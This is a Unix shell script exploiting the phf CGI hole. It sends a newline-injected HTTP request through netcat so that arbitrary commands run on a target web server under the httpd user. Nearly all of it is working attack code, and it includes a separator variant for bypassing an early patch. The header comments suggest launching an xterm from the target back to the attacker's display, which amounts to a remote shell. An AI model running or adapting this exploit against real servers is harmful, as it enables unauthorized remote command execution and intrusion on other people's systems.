#!/bin/sh
#
# phf '98 by Jimmy J
#
# Required:
#  nc (netcat) ftp://ftp.avian.org/src/hacks/nc110.tgz
#
# Example:
#  phf www.lame.net uname%20-a
#  phf www1.provider.co.uk:31337 "ps aux"
#
#  phf -p need.clues.com:8080/somewhere/else/phf
#
# Problem:
# The phf CGI does not strip newlines (%0a) out of $QUERY_STRING, so a
# newline embedded in a ph database query can be followed by an arbitrary
# shell command, which the target then executes.
#
# Impact:
# An attacker can remotely execute commands on the host machine under the
# uid of the httpd process.
#
# Notes:
# The -p switch sends %ff instead of %0a as the separator.  If /bin/sh on
# the target is bash, the 0xff byte is taken as a command separator (the
# bash "255" hole), which gets past an early, incomplete patch.
#
# id is executed if no command is specified.
#
# Space works if you surround the command in quotes.  eg; 'df -k'
#
# %20 is a URL-encoded space and %0a a URL-encoded newline; search
# Altavista for an ASCII table if you need other codes.  phf filters out
# the ">" character, so output cannot be redirected into a .rhosts file.
#
# A reminder for the X users among you: DISPLAY=x.x.x.x; xterm -ut & as
# the command can be very useful once you have run xhost + on your own
# machine.  Bear in mind that xhost + opens your display to every host,
# so revoke it with xhost - afterwards.
#
# I wrote this mainly for personal amusement but phf is one of those things
# that lives forever so someone will find a use for this.
#
# Be nice.
#

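# Print the synopsis to stderr and exit 1.  Called when the target
# argument is missing or an option is not understood.
usage() {
	# ${0##*/} is the POSIX equivalent of basename; printf avoids the
	# echo option/backslash quirks of some /bin/sh implementations.
	printf 'Usage: %s [-p] <host>[:port/cgi-bin/phf] [command]\n' "${0##*/}" >&2
	exit 1
}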

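# Defaults: plain HTTP port and the newline separator phf fails to strip.
port=80
escape=%0a

# parse_args [-p] <host>[:port/cgi-bin/phf] [command]
# Sets the globals victim, command and escape from the script arguments.
# -p switches the separator to %ff (see the notes in the header); any
# other option goes to usage() instead of being silently used as the
# host name.  getopts stops at the first non-option argument, so a "-p"
# given after the host is still taken as the command.
parse_args() {
	OPTIND=1
	while getopts p opt; do
		case $opt in
		p) escape=%ff ;;
		*) usage ;;
		esac
	done
	shift $((OPTIND - 1))
	victim=$1
	command=$2
}
parse_args "$@"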

# No target means nothing to do: print the synopsis and bail out.
[ -n "$victim" ] || usage

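# Path of the vulnerable CGI unless the target argument names another one.
phf=/cgi-bin/phf

# parse_target <host>[:port][/path/to/phf]
# Splits the target argument into the globals victim (host), port and phf.
# host:port/path and host:port are the forms documented in usage(); a bare
# host/path (port left at its default) is accepted as well.  Only POSIX
# parameter expansion is used, so there are no extra processes and no word
# splitting on odd characters in the argument.
parse_target() {
	case $1 in
	*:*/*)
		# host:port/path -- everything after the first "/" is the CGI path
		phf="/${1#*/}"
		port=${1%%/*}
		port=${port#*:}
		victim=${1%%:*}
		;;
	*:*)
		# host:port
		port=${1#*:}
		victim=${1%%:*}
		;;
	*/*)
		# host/path, port unchanged
		phf="/${1#*/}"
		victim=${1%%/*}
		;;
	*)
		victim=$1
		;;
	esac
}
parse_target "$victim"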

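# encode_command <command>
# Prints the command with every space replaced by %20 so it survives as a
# single query-string value.  Nothing else is touched: the examples in the
# header pass commands that are already partly encoded (uname%20-a), so
# "%" must stay as it is.  Other characters with a meaning in a query
# string ("&", "#", "+") are not encoded either; pre-encode them yourself.
encode_command() {
	# printf rather than echo: under some /bin/sh implementations echo
	# interprets backslashes and eats a leading -n/-e, which would
	# silently alter the command before it is sent.
	printf '%s\n' "$1" | sed 's/ /%20/g'
}

# id is run if no command was given.
command=$(encode_command "${command:-id}")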

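# build_request
# Writes the HTTP/1.0 request to stdout.  The whole exploit is the Jserver
# value: host, separator, command, separator.  phf does not strip the
# separator (newline, or 0xff for bash) out of QUERY_STRING, so the
# command runs on the target under the httpd uid.  The remaining Q* fields
# are ordinary ph form fields, left empty except Qname.  Every value goes
# in as a printf argument, never into the format string, so "%" sequences
# in the command or separator are passed through untouched.  Lines end in
# CRLF as HTTP requires; the original sent bare LF.
build_request() {
	printf 'GET %s?Jserver=%s%s%s%s&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0\r\n' \
		"$phf" "$victim" "$escape" "$command" "$escape"
	printf 'Host: %s\r\n' "$victim"
	printf 'Accept: text/html, text/plain, application/x-wais-source, */*\r\n'
	printf 'User-Agent: Lynx/2.5  libwww/2.14\r\n'
	printf 'Referer: http://%s/\r\n' "$victim"
	printf '\r\n'
}

printf 'Trying %s:%s%s... [%s] [%s]\n' "$victim" "$port" "$phf" "$escape" "$command"

# netcat is the only thing this script needs; refuse to run without it
# instead of printing "Trying ..." and then dying on a missing command.
command -v nc >/dev/null 2>&1 || {
	printf 'nc (netcat) not found in PATH; see the header for where to get it\n' >&2
	exit 1
}

# -v reports the connection on stderr.  No read timeout is set, so a
# target that never closes the connection will keep nc waiting; add -w
# if that is a problem.
build_request | nc -v "$victim" "$port"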
